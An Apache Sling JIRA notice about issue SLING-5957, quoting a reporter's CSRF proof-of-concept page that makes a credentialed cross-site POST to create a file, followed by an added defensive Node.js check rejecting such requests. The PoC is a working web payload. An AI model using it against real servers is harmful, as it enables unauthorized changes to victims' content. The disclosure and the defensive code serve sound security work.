Posted to dev@sling.apache.org by "Carsten Ziegeler (JIRA)" <ji...@apache.org> on 2016/08/31 13:17:20 UTC

[jira] [Resolved] (SLING-5957) SlingPostServlet: susceptible CSRF with empty content-type

     [ https://issues.apache.org/jira/browse/SLING-5957?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Carsten Ziegeler resolved SLING-5957.
-------------------------------------
    Resolution: Not A Problem

> SlingPostServlet: susceptible CSRF with empty content-type
> ----------------------------------------------------------
>
>                 Key: SLING-5957
>                 URL: https://issues.apache.org/jira/browse/SLING-5957
>             Project: Sling
>          Issue Type: Bug
>          Components: Servlets
>            Reporter: Dominique Jäggi
>              Labels: csrf, security
>
> The _SlingPostServlet_ creates a resource from a cross-site request like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         xhr.open("POST", "http://localhost:8080/test/csrf.txt", true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" />
>     </form>
>   </body>
> </html>
> {code}



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
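An added example, not part of SLING-5957 and not Sling's own code: a server-side pre-check, written as a plain Node.js function rather than a Sling servlet filter, that rejects the request shape the PoC above produces (a credentialed cross-site POST whose body is a typeless Blob, so the browser sends no Content-Type header) and, more generally, any state-changing request whose Origin or Referer does not name the site's own origin. The allowed origin reuses the localhost:8080 instance from the PoC; the attacker origin, cookie value and the request objects are constructed sample data.

```javascript
// Added example for SLING-5957: not the project's code. Decides whether a
// state-changing request may proceed, based only on method and headers.
// Origins and cookie values below are constructed placeholders.

const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Case-insensitive header lookup over a plain { name: value } object.
function headerValue(headers, name) {
  const wanted = name.toLowerCase();
  const key = Object.keys(headers).find((k) => k.toLowerCase() === wanted);
  return key === undefined ? undefined : headers[key];
}

// Origin part of an absolute URL, or undefined when the value is not one.
function originOf(url) {
  try {
    return new URL(url).origin;
  } catch (e) {
    return undefined;
  }
}

// Returns { allow: boolean, reason: string } for a request given as
// { method, headers }. allowedOrigins lists the origins permitted to issue
// state-changing requests (normally just the site's own origin).
function checkStateChangingRequest(req, allowedOrigins) {
  const method = req.method.toUpperCase();
  if (SAFE_METHODS.has(method)) {
    return { allow: true, reason: "safe method" };
  }

  // The PoC sends a Blob with no type, so the browser emits no Content-Type.
  // A legitimate form or API client always sets one, so an absent or empty
  // header on a POST is rejected outright.
  const contentType = headerValue(req.headers, "content-type");
  if (contentType === undefined || contentType.trim() === "") {
    return { allow: false, reason: "missing Content-Type on state-changing request" };
  }

  // A cross-site form post carries a Content-Type too, so the header alone is
  // no CSRF defence: the request must also be attributable to an allowed origin.
  const origin =
    headerValue(req.headers, "origin") ??
    originOf(headerValue(req.headers, "referer") ?? "");
  if (origin === undefined) {
    return { allow: false, reason: "no Origin or Referer to attribute the request to" };
  }
  if (!allowedOrigins.has(origin)) {
    return { allow: false, reason: `cross-site request from ${origin}` };
  }

  return { allow: true, reason: "same-origin request with explicit Content-Type" };
}

// Constructed sample requests modelled on the report.
const ALLOWED_ORIGINS = new Set(["http://localhost:8080"]);

const SAMPLE_REQUESTS = {
  // What the PoC produces: credentialed POST, foreign Origin, no Content-Type.
  csrfPoc: {
    method: "POST",
    headers: { Origin: "http://attacker.example", Cookie: "login-token=constructed" },
  },
  // A normal form post from the site's own pages.
  legitimateForm: {
    method: "POST",
    headers: {
      Origin: "http://localhost:8080",
      "Content-Type": "application/x-www-form-urlencoded",
      Cookie: "login-token=constructed",
    },
  },
  // Cross-site form post: Content-Type present, Origin foreign.
  crossSiteForm: {
    method: "POST",
    headers: {
      Origin: "http://attacker.example",
      "Content-Type": "application/x-www-form-urlencoded",
    },
  },
  // Plain read; never subject to the check.
  read: { method: "GET", headers: {} },
};

// Runs every sample through the check and returns the decisions by name.
function evaluateSamples() {
  const out = {};
  for (const [name, req] of Object.entries(SAMPLE_REQUESTS)) {
    out[name] = checkStateChangingRequest(req, ALLOWED_ORIGINS);
  }
  return out;
}

for (const [name, r] of Object.entries(evaluateSamples())) {
  console.log(`${name}: ${r.allow ? "ALLOW" : "REJECT"} (${r.reason})`);
}
```

The two rejections are deliberately distinct: the missing Content-Type catches exactly the typeless-Blob request from the PoC, while the Origin/Referer comparison also covers the ordinary cross-site form post that does carry a Content-Type. A real deployment would additionally need a per-request token or the framework's own referrer filtering for clients that strip both headers.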